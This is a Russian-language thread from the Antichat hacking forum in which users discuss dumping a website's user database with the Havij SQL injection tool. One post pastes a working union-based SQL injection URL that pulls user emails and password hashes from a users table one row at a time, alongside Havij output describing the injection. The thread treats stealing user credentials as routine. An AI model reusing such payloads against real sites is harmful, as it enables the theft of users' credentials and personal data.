HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.07.2014, 15:02
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

А зачем сливать havijом ? Или у тебя blind-inj?
 
Ответить с цитированием

  #12  
Старый 10.07.2014, 16:48
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от попугай  
А зачем сливать havijом ? Или у тебя blind-inj?
Цитата:
Сообщение от None  
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 1
Это явно не блинд!
 
Ответить с цитированием

  #13  
Старый 10.07.2014, 16:48
djkefir
Новичок
Регистрация: 17.12.2010
Сообщений: 28
С нами: 8106806

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
А зачем сливать havijом ? Или у тебя blind-inj?
Хавиджем сливаю потому что никак по-другому не умею)

Сейчас ищу дампер какой-нибудь.

Отснифал у хавиджа запрос скуль:

Код:
http://www.url.com/page.php?id=999999.9(+union+all+select+(select+concat(0x27,0x7e,pcp_users.user_email,0x5e,pcp_users.user_phash,0x27,0x7e)+from+`PCP7_TEST`.pcp_users+limit+1358,1)
 
Ответить с цитированием

  #14  
Старый 10.07.2014, 16:50
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
limit+1358,1
Понятно, почему так долго.

попугай, да потому что по другому человек не умеет.
 
Ответить с цитированием

  #15  
Старый 10.07.2014, 22:23
erwap
Познающий
Регистрация: 20.09.2012
Сообщений: 53
С нами: 7180886

Репутация: 0
По умолчанию

Цитата:
Сообщение от djkefir  
Хавиджем сливаю потому что никак по-другому не умею)
Сейчас ищу дампер какой-нибудь.
Отснифал у хавиджа запрос скуль:
Код:
http://www.url.com/page.php?id=999999.9(+union+all+select+(select+concat(0x27,0x7e,pcp_users.user_email,0x5e,pcp_users.user_phash,0x27,0x7e)+from+`PCP7_TEST`.pcp_users+limit+1358,1)
А как снифал? у него вроде нет такого функционала
 
Ответить с цитированием

  #16  
Старый 11.07.2014, 01:25
djkefir
Новичок
Регистрация: 17.12.2010
Сообщений: 28
С нами: 8106806

Репутация: 0
По умолчанию

Цитата:
Сообщение от erwap  
А как снифал? у него вроде нет такого функционала
Хммм. HTTP Analyzer -_-
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.